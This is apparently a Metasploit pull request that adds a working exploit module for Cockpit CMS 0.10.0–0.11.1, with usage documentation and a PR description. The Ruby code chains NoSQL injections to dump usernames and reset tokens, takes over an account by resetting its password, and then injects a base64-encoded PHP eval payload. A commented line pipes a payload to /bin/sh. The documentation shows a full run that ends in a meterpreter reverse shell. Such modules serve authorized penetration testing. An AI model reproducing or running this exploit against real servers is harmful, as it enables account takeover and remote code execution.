### PR TITLE
cockpit cms rce

### DIFF
--- a/documentation/modules/exploit/multi/http/cockpit_cms_rce.md
+++ b/documentation/modules/exploit/multi/http/cockpit_cms_rce.md
@@ -1,0 +1,121 @@
+## Vulnerable Application
+
+This module exploits two NoSQLi vulnerabilities to retrieve the user list,
+and password reset tokens from the system.  Next, the USER is targetted to
+reset their password.
+
+Then a command injection vulnerability is used to execute the payload.
+While it is possible to upload a payload and execute it, the command injection
+provides a no disk write method which is more stealthy.
+
+The following versions of Cockpit CMS contain all the necessary vulnerabilities for exploitation:
+
+* 0.11.1
+* 0.11.0
+* 0.10.2
+* 0.10.1
+* 0.10.0
+
+### Install
+
+Follow https://blog.sommerfeldsven.de/how-to-install-cockpit-cms-on-nginx/
+
+MAKE SURE TO BROWSE TO `/install` TO FINISH INSTALL!!
+
+Some useful addresses which don't seem to be well documented:
+
+* `/finder` for a file system browser
+* `/accounts` for adding accounts
+* `/install` to finish install
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use exploit/multi/http/cockpit_cms_rce`
+1. Do: `run`
+1. Do: `set USER [user]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### ENUM_USERS
+
+Use CVE-2020-35846 to enumerate users on the system.
+
+### USER
+
+Username to reset the password of, and login as to perform the command injection with. Defaults to `''`
+
+## Scenarios
+
+### Cockpit CMS 0.11.1 on Ubuntu 20.04
+
+#### Obtain list of users
+
+```
+[*] Processing cockpit.rb for ERB directives.
+resource (cockpit.rb)> use exploit/multi/http/cockpit_cms_rce
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+resource (cockpit.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (cockpit.rb)> set verbose true
+verbose => true
+msf6 exploit(multi/http/cockpit_cms_rce) > check
+
+[*] Attempting Username Enumeration (CVE-2020-35846)
+[*] 2.2.2.2:80 - The target appears to be vulnerable.
+msf6 exploit(multi/http/cockpit_cms_rce) > run
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Attempting Username Enumeration (CVE-2020-35846)
+[+]   Found users: ["admin", "asdf22", "4g4gsegs"]
+[-] Exploit aborted due to failure: bad-config: 2.2.2.2:80 - User to exploit required
+[*] Exploit completed, but no session was created.
+```
+
+#### Exploit user
+
+```
+msf6 exploit(multi/http/cockpit_cms_rce) > set user asdf22
+user => asdf22
+msf6 exploit(multi/http/cockpit_cms_rce) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] Attempting Username Enumeration (CVE-2020-35846)
+[+]   Found users: ["admin", "asdf22", "4g4gsegs"]
+[*] Obtaining reset tokens (CVE-2020-35847)
+[*] Attempting to generate tokens
+[*] Obtaining reset tokens (CVE-2020-35847)
+[+]   Found tokens: ["rp-09397d385d8b4d781906f1bde62a3da8607c4193bc15c"]
+[*] Checking token: rp-09397d385d8b4d781906f1bde62a3da8607c4193bc15c
+[*] Obtaining user info
+[*]   user: asdf22
+[*]   email: none@none.com
+[*]   active: true
+[*]   group: admin
+[*]   i18n: en
+[*]   api_key: account-8d9e39cf206a7392d292efc281e824
+[*]   password: $2y$10$R4mShvdxnXxxnTH85apRLedSWfYbOk4qsGQwG7apOfdQBVRnhEcme
+[*]   name: dsf22
+[*]   _modified: 1618755509
+[*]   _created: 1618755500
+[*]   _id: 607c3fac62336679e30002c3
+[*]   _reset_token: rp-09397d385d8b4d781906f1bde62a3da8607c4193bc15c
+[*]   md5email: 3eda6fcd3204ef285fa52176c28c4d3e
+[+] Changing password to BoicMQSMPv
+[+] Password update successful
+[*] Attempting login
+[+] Valid cookie for asdf22: c8695f6d766afc426d0e99f58fb04e0d=d3t7e356h03eufhuc55g91kgsb;
+[*] Attempting RCE
+[*] Sending stage (39282 bytes) to 2.2.2.2
+[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:37260) at 2021-04-18 10:26:27 -0400
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : ubuntu2004
+OS          : Linux ubuntu2004 5.4.0-56-generic #62-Ubuntu SMP Mon Nov 23 19:20:19 UTC 2020 x86_64
+Meterpreter : php/linux
+```

--- a/modules/exploits/multi/http/cockpit_cms_rce.rb
+++ b/modules/exploits/multi/http/cockpit_cms_rce.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_users(check: false)
-    vprint_status('Attempting Username Enumeration (CVE-2020-35846)')
+    print_status('Attempting Username Enumeration (CVE-2020-35846)')
     res = send_request_raw(
       'uri' => '/auth/requestreset',
       'method' => 'POST',
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_reset_tokens
-    vprint_status('Obtaining reset tokens (CVE-2020-35847)')
+    print_status('Obtaining reset tokens (CVE-2020-35847)')
     res = send_request_raw(
       'uri' => '/auth/resetpassword',
       'method' => 'POST',
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_user_info(token)
-    vprint_status('Obtaining user info')
+    print_status('Obtaining user info')
     res = send_request_raw(
       'uri' => '/auth/newpassword',
       'method' => 'POST',
@@ -134,7 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def reset_password(token, user)
     password = Rex::Text.rand_password
-    vprint_good("Changing password to #{password}")
+    print_good("Changing password to #{password}")
     res = send_request_raw(
       'uri' => '/auth/resetpassword',
       'method' => 'POST',
@@ -242,7 +242,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     if datastore['ENUM_USERS']
       users = get_users
-      vprint_good("  Found users: #{users}")
+      print_good("  Found users: #{users}")
     end
 
     fail_with(Failure::BadConfig, "#{peer} - User to exploit required") if datastore['user'] == ''
@@ -253,7 +253,7 @@ class MetasploitModule < Msf::Exploit::Remote
       gen_token(datastore['USER'])
       tokens = get_reset_tokens
     end
-    vprint_good("  Found tokens: #{tokens}")
+    print_good("  Found tokens: #{tokens}")
     good_token = ''
     tokens.each do |token|
       print_status("Checking token: #{token}")

--- a/modules/exploits/multi/http/cockpit_cms_rce.rb
+++ b/modules/exploits/multi/http/cockpit_cms_rce.rb
@@ -1,0 +1,271 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/hashes/identify'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Cockpit CMS NoSQLi to RCE',
+        'Description' => %q{
+          This module exploits two NoSQLi vulnerabilities to retrieve the user list,
+          and password reset tokens from the system.  Next, the USER is targetted to
+          reset their password.
+          Then a command injection vulnerability is used to execute the payload.
+          While it is possible to upload a payload and execute it, the command injection
+          provides a no disk write method which is more stealthy.
+          Cockpit CMS 0.10.0 - 0.11.1, inclusive, contain all the necessary vulnerabilities
+          for exploitation.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'h00die', # msf module
+            'Nikita Petrov' # original PoC, analysis
+          ],
+        'References' =>
+          [
+            [ 'URL', 'https://swarm.ptsecurity.com/rce-cockpit-cms/' ],
+            [ 'CVE', '2020-35847' ], # reset token extraction
+            [ 'CVE', '2020-35846' ], # user name extraction
+          ],
+        'Platform' => ['php'],
+        'Arch' => ARCH_PHP,
+        'Privileged' => false,
+        'Targets' =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultOptions' =>
+          {
+            'PrependFork' => true
+          },
+        'DisclosureDate' => '2021-04-13',
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            # ACCOUNT_LOCKOUTS due to reset of user password
+            'SideEffects' => [ ACCOUNT_LOCKOUTS, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ],
+            'Stability' => [ CRASH_SERVICE_DOWN ]
+          }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The URI of Cockpit', '/']),
+        OptBool.new('ENUM_USERS', [false, 'Enumerate users', true]),
+        OptString.new('USER', [false, 'User account to take over', ''])
+      ], self.class
+    )
+  end
+
+  def get_users(check: false)
+    vprint_status('Attempting Username Enumeration (CVE-2020-35846)')
+    res = send_request_raw(
+      'uri' => '/auth/requestreset',
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => JSON.generate({ 'user' => { '$func' => 'var_dump' } })
+    )
+
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless res
+
+    # return bool of if not vulnerable
+    # https://github.com/agentejo/cockpit/blob/0.11.2/lib/MongoLite/Database.php#L432
+    if check
+      return (res.body.include?('Function should be callable') ||
+              # https://github.com/agentejo/cockpit/blob/0.12.0/lib/MongoLite/Database.php#L466
+              res.body.include?('Condition not valid') ||
+              res.body.scan(/string\(\d{1,2}\)\s*"([\w-]+)"/).flatten == [])
+    end
+
+    res.body.scan(/string\(\d{1,2}\)\s*"([\w-]+)"/).flatten
+  end
+
+  def get_reset_tokens
+    vprint_status('Obtaining reset tokens (CVE-2020-35847)')
+    res = send_request_raw(
+      'uri' => '/auth/resetpassword',
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => JSON.generate({ 'token' => { '$func' => 'var_dump' } })
+    )
+
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless res
+
+    res.body.scan(/string\(\d{1,2}\)\s*"([\w-]+)"/).flatten
+  end
+
+  def get_user_info(token)
+    vprint_status('Obtaining user info')
+    res = send_request_raw(
+      'uri' => '/auth/newpassword',
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => JSON.generate({ 'token' => token })
+    )
+
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless res
+
+    /this.user\s+=([^;]+);/ =~ res.body
+    userdata = JSON.parse(Regexp.last_match(1))
+    userdata.each do |k, v|
+      print_status("  #{k}: #{v}")
+    end
+    report_cred(
+      username: userdata['user'],
+      password: userdata['password'],
+      private_type: :nonreplayable_hash
+    )
+    userdata
+  end
+
+  def reset_password(token, user)
+    password = Rex::Text.rand_password
+    vprint_good("Changing password to #{password}")
+    res = send_request_raw(
+      'uri' => '/auth/resetpassword',
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => JSON.generate({ 'token' => token, 'password' => password })
+    )
+
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless res
+
+    # loop through found results
+    body = JSON.parse(res.body)
+    print_good('Password update successful') if body['success']
+    report_cred(
+      username: user,
+      password: password,
+      private_type: :password
+    )
+    password
+  end
+
+  def report_cred(opts)
+    service_data = {
+      address: datastore['RHOST'],
+      port: datastore['RPORT'],
+      service_name: 'http',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: opts[:username],
+      private_data: opts[:password],
+      private_type: opts[:private_type],
+      jtr_format: identify_hash(opts[:password])
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      proof: ''
+    }.merge(service_data)
+    create_credential_login(login_data)
+  end
+
+  def login(un, pass)
+    print_status('Attempting login')
+    res = send_request_cgi(
+      'uri' => '/auth/login'
+    )
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless res
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless /csfr\s+:\s+"([^"]+)"/ =~ res.body
+    cookie = res.get_cookies
+    res = send_request_raw(
+      'uri' => '/auth/check',
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'cookie' => cookie,
+      'data' => JSON.generate({ 'auth' => { 'user' => un, 'password' => pass }, 'csfr' => Regexp.last_match(1) })
+    )
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless res
+    fail_with(Failure::UnexpectedReply, "#{peer} - Login failed. This is unexpected...") if res.body.include?('"success":false')
+    print_good("Valid cookie for #{un}: #{cookie}")
+    cookie
+  end
+
+  def gen_token(user)
+    print_status('Attempting to generate tokens')
+    res = send_request_raw(
+      'uri' => '/auth/requestreset',
+      'method' => 'POST',
+      'ctype' => 'application/json',
+      'data' => JSON.generate({ user: user })
+    )
+    fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to the web service") unless res
+  end
+
+  def rce(cookie)
+    print_status('Attempting RCE')
+    p = Rex::Text.encode_base64(payload.encoded)
+    send_request_raw(
+      'uri' => '/accounts/find',
+      'method' => 'POST',
+      'cookie' => cookie,
+      'ctype' => 'application/json',
+      # this is more similar to how the original POC worked, however even with the & and prepend fork
+      # it was locking the website (php/db_conn?) and throwing 504 or 408 errors from nginx until the session
+      # was killed when using an arch => cmd type payload.
+      # 'data'     => "{\"options\":{\"filter\":{\"' + die(`echo '#{p}' | base64 -d | /bin/sh&`) + '\":0}}}"
+      # with this method most pages still seem to load, logins work, but the password reset will not respond
+      # however, everything else seems to work ok
+      'data' => "{\"options\":{\"filter\":{\"' + eval(base64_decode('#{p}')) + '\":0}}}"
+    )
+  end
+
+  def check
+    begin
+      return Exploit::CheckCode::Appears unless get_users(check: true)
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    if datastore['ENUM_USERS']
+      users = get_users
+      vprint_good("  Found users: #{users}")
+    end
+
+    fail_with(Failure::BadConfig, "#{peer} - User to exploit required") if datastore['user'] == ''
+
+    tokens = get_reset_tokens
+    # post exploitation sometimes things get wonky, but doing a password recovery seems to fix it.
+    if tokens == []
+      gen_token(datastore['USER'])
+      tokens = get_reset_tokens
+    end
+    vprint_good("  Found tokens: #{tokens}")
+    good_token = ''
+    tokens.each do |token|
+      print_status("Checking token: #{token}")
+      userdata = get_user_info(token)
+      if userdata['user'] == datastore['USER']
+        good_token = token
+        break
+      end
+    end
+    fail_with(Failure::UnexpectedReply, "#{peer} - Unable to get valid password reset token for user. Double check user") if good_token == ''
+    password = reset_password(good_token, datastore['USER'])
+    cookie = login(datastore['USER'], password)
+    rce(cookie)
+  end
+end


### PR DESCRIPTION
This PR adds a new module to exploit cockpit cms versions 0.10.0 through 0.11.1 (verified on all of those).  Originally discovered by @ptswarm and beautifully written here: https://swarm.ptsecurity.com/rce-cockpit-cms/ .  This uses two nosql injections to get the user list, and password reset token list, enumerate the tokens to the users, reset a password, login, then a command injection for RCE.
It's beautiful.  @ptswarm if you want an email, or another person added to the module authors, let me know!

This exploit works in a 2 part fashion, first you run it and it will pull the list of users.  then you set `USER` to target a specific user, then `run` to drop shells like a pro.

@bwatters-r7 if you test this you'll forget to hit the `/install` URL after install to create the admin user.

## Verification

- [x] See docs for the link i used for the install
- [x] Start `msfconsole`
- [x] `use exploit/multi/http/cockpit_cms_rce`
- [x] set rhost/port
- [x] `check`
- [x] `run` to get the list of users
- [x] `set user [user]`
- [x] `exploit`
- [x] **Verify** you get a shell
- [x] **Document** the thing and how it works
